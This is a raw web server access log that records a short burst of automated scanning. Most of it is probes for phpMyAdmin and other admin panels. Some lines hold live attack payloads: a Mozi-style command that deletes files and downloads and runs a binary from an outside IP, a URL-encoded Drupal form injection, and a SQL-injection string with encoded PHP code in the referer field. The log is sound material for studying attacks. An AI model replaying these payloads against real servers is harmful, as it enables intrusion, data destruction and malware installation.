106.13.208.37 - - [01/Jan/2021:11:44:39 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:44:40 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:11:45:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.238.255.89 - - [01/Jan/2021:11:45:00 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://42.238.255.89:57644/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
106.13.208.37 - - [01/Jan/2021:11:45:04 +0100] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
106.13.208.37 - - [01/Jan/2021:11:45:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
185.239.242.162 - - [01/Jan/2021:11:45:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
106.13.208.37 - - [01/Jan/2021:11:45:52 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Jan/2021:11:46:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:46:16 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.208.37 - - [01/Jan/2021:11:46:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Jan/2021:11:47:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:47:06 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
95.105.44.152 - - [01/Jan/2021:11:47:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:47:29 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.208.37 - - [01/Jan/2021:11:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Jan/2021:11:48:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:48:19 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.208.37 - - [01/Jan/2021:11:48:43 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Jan/2021:11:49:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:49:11 +0100] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 404 313 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:49:11 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:11 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:11 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:11 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:12 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:12 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:12 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:12 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:13 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:13 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:13 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:13 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:14 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:14 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:14 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:14 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:14 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:15 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:15 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:15 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:15 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:16 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:16 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:16 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:17 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:17 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:18 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:18 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:18 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:18 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:19 +0100] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:19 +0100] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:19 +0100] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:19 +0100] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:19 +0100] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:20 +0100] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:20 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:20 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:20 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:21 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:21 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:21 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:21 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:22 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:22 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:22 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:22 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:22 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:23 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:23 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:23 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:23 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:24 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:24 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:24 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:24 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:25 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:25 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:25 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:25 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:25 +0100] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:26 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:26 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:26 +0100] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:26 +0100] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:27 +0100] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:27 +0100] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:27 +0100] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:27 +0100] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:28 +0100] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:28 +0100] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:28 +0100] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:28 +0100] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:28 +0100] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:29 +0100] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:29 +0100] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:29 +0100] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:29 +0100] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:30 +0100] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:30 +0100] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:30 +0100] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:30 +0100] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:31 +0100] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:31 +0100] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:31 +0100] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:31 +0100] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:31 +0100] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:32 +0100] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:32 +0100] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:32 +0100] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:32 +0100] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:33 +0100] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:33 +0100] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:34 +0100] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:34 +0100] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:34 +0100] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:34 +0100] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:34 +0100] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:35 +0100] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:35 +0100] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:36 +0100] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:36 +0100] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:36 +0100] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:49:40 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:49:40 +0100] "POST /axis2/axis2-admin/login HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:11:50:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:51:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:52:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:53:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.145.250 - - [01/Jan/2021:11:53:31 +0100] "GET /bag2 HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
